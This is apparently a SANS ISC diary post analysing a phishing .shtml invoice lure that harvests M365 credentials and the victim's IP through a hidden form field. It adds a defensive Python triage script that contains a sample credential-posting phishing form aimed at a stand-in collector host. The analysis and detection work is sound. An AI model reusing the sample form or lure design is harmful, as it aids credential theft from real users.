Last Updated: 2023-05-20 10:06:24 UTC
by Xavier Mertens (Version: 1)
While reviewing my last findings today, I found a phishing email that delivered a classic .shtml file called "PROFORMA INVOICE.shtml". Nothing special so far; emails like this one are widespread. When you open the file in a sandbox, it reveals a classic form:
The potential victim is asked to enter his/her M365 credentials to reveal the Excel sheet (the email address has been obfuscated). I had a quick look at the HTML code and found something interesting in the HTML form:
<input type="hidden" name="ip" id="hIP">
The line in red assigns the victim's public IP address to the hidden field hIP, so it is exfiltrated together with the credentials when the form is submitted.
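As an added defender-side example (not from the diary), a small Python triage helper that parses an HTML/SHTML attachment with the standard library and flags any form that asks for a password while also carrying a hidden IP-style field such as name="ip" / id="hIP"; the sample HTML, the collector URL and the list of field-name tokens are constructed assumptions.

```python
"""Added triage helper: flag forms that collect a password plus a hidden IP field."""
import re
from html.parser import HTMLParser
# Constructed sample mimicking the lure's form; not the real attachment.
SAMPLE_HTML = """<form method="post" action="https://collector.invalid/post.php">
  <input type="email" name="email" value="victim@example.com">
  <input type="password" name="pass">
  <input type="hidden" name="ip" id="hIP">
  <input type="submit" value="Open Excel sheet">
</form>"""
# Normalised hidden-field names/ids that suggest the victim's public IP is stashed.
IP_FIELD_TOKENS = {"ip", "hip", "clientip", "userip", "ipaddr", "ipaddress", "publicip"}

class FormInputCollector(HTMLParser):
    """Collect each <form>'s action and the attributes of its <input> tags."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def _norm(s):
    return re.sub(r"[^a-z]", "", s.lower())

def analyse_html(html):
    """One finding per form: post target, password prompt, hidden IP-like inputs."""
    parser = FormInputCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        inputs = form["inputs"]
        has_password = any(i.get("type", "").lower() == "password" for i in inputs)
        ip_fields = sorted(i.get("name") or i.get("id") for i in inputs
                           if i.get("type", "").lower() == "hidden"
                           and (_norm(i.get("name", "")) in IP_FIELD_TOKENS
                                or _norm(i.get("id", "")) in IP_FIELD_TOKENS))
        findings.append({"action": form["action"], "has_password": has_password,
                         "hidden_ip_fields": ip_fields,
                         "suspicious": has_password and bool(ip_fields)})
    return findings
```

Run it over every extracted HTML/SHTML attachment and alert on any finding with "suspicious": True; the "action" value gives you the credential collector to block.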
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant